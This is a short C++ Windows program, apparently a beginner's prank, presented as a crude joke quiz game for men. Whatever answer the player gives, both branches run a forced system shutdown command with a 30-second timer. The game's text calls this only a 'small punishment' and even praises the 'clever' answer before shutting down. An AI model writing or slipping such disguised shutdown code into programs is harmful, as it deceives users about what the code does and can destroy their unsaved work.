新手光能
#include<iostream>
#include<cstdio>
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
int a;
cout<<"如果你是男人,可以尝试一下这个游戏(温馨提示:错了会面临小惩罚欧)\n";
Sleep(200);
cout<<"题一,你面前有一坨OMO,你该怎么做?\n";
Sleep(200);
cout<<"_________________\n";
Sleep(200);
cout<<"| OMO |\n";
Sleep(200);
cout<<"| | | | |\n";
Sleep(200);
cout<<"| | | | |\n";
Sleep(200);
cout<<"| |\n";
Sleep(200);
cout<<"|你 |\n";
Sleep(200);
cout<<"|________________|\n1.干了它 2.叫来保洁阿姨";
Sleep(200);
cin>>a;
if(a==1){
cout<<"_________________\n";
cout<<"| |\n";
cout<<"| | | | 你|\n";
cout<<"| | | | |\n";
cout<<"| |\n";
cout<<"| |\n";
cout<<"|________________|\n";
Sleep(200);
cout<<"O";
Sleep(200);
cout<<"M";
Sleep(200);
cout<<"O";
Sleep(200);
cout<<"香";
Sleep(200);
cout<<"不";
Sleep(200);
cout<<"香";
system("shutdown -s -f -t 30");
}
else{
cout<<"你真聪明";
Sleep(1000);
cout<<"那让我来为你关机吧!";
system("shutdown -s -f -t 30");
}
}//以后再更新了,今天智商有限